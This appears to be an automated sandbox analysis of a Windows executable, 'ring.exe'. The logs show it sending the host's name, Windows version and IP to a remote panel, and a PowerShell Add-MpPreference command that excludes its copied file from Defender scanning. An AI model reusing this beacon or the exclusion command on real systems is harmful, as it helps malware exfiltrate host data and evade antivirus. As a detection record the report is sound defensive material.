                              Nov 19, 2024 20:36:17.245806932 CET192.168.2.71.1.1.10x18fcStandard query (0)adsklbb.orgA (IP address)IN (0x0001)false
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Nov 19, 2024 20:36:12.190618038 CET1.1.1.1192.168.2.70x4a00No error (0)api64.ipify.org104.237.62.213A (IP address)IN (0x0001)false
                              Nov 19, 2024 20:36:12.190618038 CET1.1.1.1192.168.2.70x4a00No error (0)api64.ipify.org173.231.16.77A (IP address)IN (0x0001)false
                              Nov 19, 2024 20:36:17.379138947 CET1.1.1.1192.168.2.70x18fcNo error (0)adsklbb.org24.152.39.13A (IP address)IN (0x0001)false
                              • api64.ipify.org
                              • 154.205.156.20
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.749701104.237.62.213806300C:\Users\user\Desktop\ring.exe
                              TimestampBytes transferredDirectionData
                              Nov 19, 2024 20:36:12.198534012 CET178OUTGET /?format=text HTTP/1.1
                              Host: api64.ipify.org
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              User-Agent: Mozilla/3.0 (compatible; Indy Library)
                              Nov 19, 2024 20:36:12.784324884 CET166INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Tue, 19 Nov 2024 19:36:12 GMT
                              Content-Type: text/plain
                              Content-Length: 11
                              Connection: keep-alive
                              Vary: Origin
                              Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                              Data Ascii: 8.46.123.75


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.749702154.205.156.20806300C:\Users\user\Desktop\ring.exe
                              TimestampBytes transferredDirectionData
                              Nov 19, 2024 20:36:14.650507927 CET275OUTGET /Painel/atualizar_dados.php?nome_pc=960781&versao_windows=Windows%2010.0%20%28Build%2019045%29%20&ultima_atualizacao=2024-11-19&plugin_instalado=Plugin%20A&status=Instalada&ip=8.46.123.75 HTTP/1.1
                              User-Agent: Delphi 5.x
                              Host: 154.205.156.20
                              Cache-Control: no-cache
                              Nov 19, 2024 20:36:15.313024044 CET372INHTTP/1.1 200 OK
                              Date: Tue, 19 Nov 2024 19:36:15 GMT
                              Server: Apache/2.4.41 (Ubuntu)
                              Vary: Accept-Encoding
                              Content-Length: 200
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 44 61 64 6f 73 20 52 65 63 65 62 69 64 6f 73 3a 3c 62 72 3e 4e 6f 6d 65 20 64 6f 20 50 43 3a 20 39 36 30 37 38 31 3c 62 72 3e 56 65 72 73 c3 a3 6f 20 64 6f 20 57 69 6e 64 6f 77 73 3a 20 57 69 6e 64 6f 77 73 20 31 30 2e 30 20 28 42 75 69 6c 64 20 31 39 30 34 35 29 20 3c 62 72 3e c3 9a 6c 74 69 6d 61 20 41 74 75 61 6c 69 7a 61 c3 a7 c3 a3 6f 3a 20 32 30 32 34 2d 31 31 2d 31 39 3c 62 72 3e 53 74 61 74 75 73 3a 20 49 6e 73 74 61 6c 61 64 61 3c 62 72 3e 44 61 64 6f 73 20 73 61 6c 76 6f 73 20 63 6f 6d 20 73 75 63 65 73 73 6f 20 6e 6f 20 61 72 71 75 69 76 6f 20 64 65 73 6b 74 6f 70 73 2e 74 78 74 21
                              Data Ascii: Dados Recebidos:<br>Nome do PC: 960781<br>Verso do Windows: Windows 10.0 (Build 19045) <br>ltima Atualizao: 2024-11-19<br>Status: Instalada<br>Dados salvos com sucesso no arquivo desktops.txt!


                              Click to jump to process

                              Click to jump to process

                              • File
                              • Registry
                              • Network

                              Click to dive into process behavior distribution

                              Target ID:4
                              Start time:14:36:10
                              Start date:19/11/2024
                              Path:C:\Users\user\Desktop\ring.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\ring.exe"
                              Imagebase:0x7c0000
                              File size:17'488'384 bytes
                              MD5 hash:DEC85DE31C5A9E3754AB0FCFED8A3E79
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:low
                              Has exited:false
                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                              Target ID:8
                              Start time:14:36:15
                              Start date:19/11/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'"
                              Imagebase:0x410000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:9
                              Start time:14:36:15
                              Start date:19/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff75da10000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:10
                              Start time:14:36:15
                              Start date:19/11/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'"
                              Imagebase:0x6f0000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true
                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                              Target ID:11
                              Start time:14:36:18
                              Start date:19/11/2024
                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                              Imagebase:0x7ff7fb730000
                              File size:496'640 bytes
                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                              Has elevated privileges:true
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Target ID:13
                              Start time:14:36:28
                              Start date:19/11/2024
                              Path:C:\Users\user\AppData\Roaming\Win_24230\ring.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\Win_24230\ring.exe"
                              Imagebase:0xcb0000
                              File size:17'488'384 bytes
                              MD5 hash:DEC85DE31C5A9E3754AB0FCFED8A3E79
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:Borland Delphi
                              Antivirus matches:
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 18%, ReversingLabs
                              Reputation:low
                              Has exited:true

                              Target ID:14
                              Start time:15:37:19
                              Start date:19/11/2024
                              Path:C:\Users\user\AppData\Roaming\Win_24230\ring.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\Win_24230\ring.exe"
                              Imagebase:0xcb0000
                              File size:17'488'384 bytes
                              MD5 hash:DEC85DE31C5A9E3754AB0FCFED8A3E79
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:Borland Delphi
                              Reputation:low
                              Has exited:true

                              No disassembly